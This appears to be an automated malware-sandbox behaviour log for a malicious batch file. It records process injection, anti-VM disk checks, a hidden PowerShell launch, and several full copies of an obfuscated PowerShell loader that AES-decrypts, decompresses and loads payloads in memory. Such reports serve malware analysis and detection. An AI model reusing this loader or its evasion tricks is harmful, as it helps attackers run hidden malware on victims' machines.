Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: F80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: B80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: ED0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 940000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1300000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2EA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2750000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2770000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: A80000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2A60000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 23A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: AB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 990000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2F10000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2270000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 830000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2B00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 2580000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 850000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: E00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 950000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 820000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\bcHWgjffogVJpbOBdGApzpPcJHjkERcDhSxHVWOAbBJWhIKyoNNYZRKOTYWjcYOSMGfcllhwyDLIV\VjiVJGJaGCXzfYkYmWkYXcWjbrWQv.exe base: 1350000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 192913B0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 139F96A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 240CBA00000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100890000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A100B40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C3D1EA0000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$juoou);'.replace('*', ''); invoke-expression '$jwqor=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$zxhyn=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fppma, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$juoou);'.replace('*', ''); invoke-expression '$cmubr=$tpeqt.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$cmubr.*i*n*v*o*k*e*($null, $dozwz);'.replace('*', '');}$tyrmi = 'c:\users\user\desktop\nhoqafkhhl.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$eti = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$gpc = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$juoou);'.replace('*', ''); invoke-expression '$jwqor=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$zxhyn=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fppma, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$juoou);'.replace('*', ''); invoke-expression '$cmubr=$tpeqt.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$cmubr.*i*n*v*o*k*e*($null, $dozwz);'.replace('*', '');}$tyrmi = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$eti = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$gpc = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$juoou);'.replace('*', ''); invoke-expression '$jwqor=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$zxhyn=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fppma, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$juoou);'.replace('*', ''); invoke-expression '$cmubr=$tpeqt.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$cmubr.*i*n*v*o*k*e*($null, $dozwz);'.replace('*', '');}$tyrmi = 'c:\users\user\desktop\nhoqafkhhl.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$eti = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$gpc = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function pchco($juoou){ $nhzjs=[system.security.cryptography.aes]::create(); $nhzjs.mode=[system.security.cryptography.ciphermode]::cbc; $nhzjs.padding=[system.security.cryptography.paddingmode]::pkcs7; $nhzjs.key=[system.convert]::frombase64string('yr7wf+ofc2flpxzphqhjqplkvtmsnk6ofotdyrtmtgi='); $nhzjs.iv=[system.convert]::frombase64string('yxvdoarolg4gnbuziyql8w=='); $ifjsd=$nhzjs.createdecryptor(); $kfqiq=$ifjsd.transformfinalblock($juoou, 0, $juoou.length); $ifjsd.dispose(); $nhzjs.dispose(); $kfqiq;}function qsuou($juoou){ invoke-expression '$fppma=new-object *s*y*s*t*e*m*.*i*o*.m*em*or*ys*tr*ea*m(,$juoou);'.replace('*', ''); invoke-expression '$jwqor=new-object *s*y*s*t*e*m*.*i*o*.*m*e*m*o*r*y*s*t*r*e*a*m*;'.replace('*', ''); invoke-expression '$zxhyn=new-object s*y*s*t*e*m*.*i*o*.c*om*pr*e*ss*io*n.*gz*ip*st*re*am*($fppma, [io.c*om*pr*es*si*on*.co*mp*re*ss*i*o*n*mode]::d*e*c*omp*re*ss);'.replace('*', ''); $zxhyn.copyto($jwqor); $zxhyn.dispose(); $fppma.dispose(); $jwqor.dispose(); $jwqor.toarray();}function ncxgw($juoou,$dozwz){ invoke-expression '$tpeqt=[*s*y*s*t*e*m*.*r*e*fl*ect*io*n.*as*se*mb*l*y*]::l*o*a*d*([byte[]]$juoou);'.replace('*', ''); invoke-expression '$cmubr=$tpeqt.*e*n*t*r*y*p*o*i*n*t*;'.replace('*', ''); invoke-expression '$cmubr.*i*n*v*o*k*e*($null, $dozwz);'.replace('*', '');}$tyrmi = 'c:\windows\$rbx-onimai2\$rbx-co2.bat';$host.ui.rawui.windowtitle = $tyrmi;$zucia=[system.io.file]::readalltext($tyrmi).split([environment]::newline);foreach ($gnopj in $zucia) { if ($gnopj.startswith('hvgsf')) { $aqovs=$gnopj.substring(5); break; }}$sltit=[string[]]$aqovs.split('\');invoke-expression '$daz = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[0].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$eti = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[1].replace("#", "/").replace("@", "a"))));'.replace('*', '');invoke-expression '$gpc = qsuou (pchco ([*c*o*n*v*e*r*t]::*f*r*o*m*b*a*s*e*6*4*s*tr*i*n*g($sltit[2].replace("#", "/").replace("@", "a"))));'.replace('*', '');ncxgw $daz $null;ncxgw $eti $null;ncxgw $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
Source: C:\Windows\System32\dllhost.exeCode function: 7_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,7_2_0000000140002300
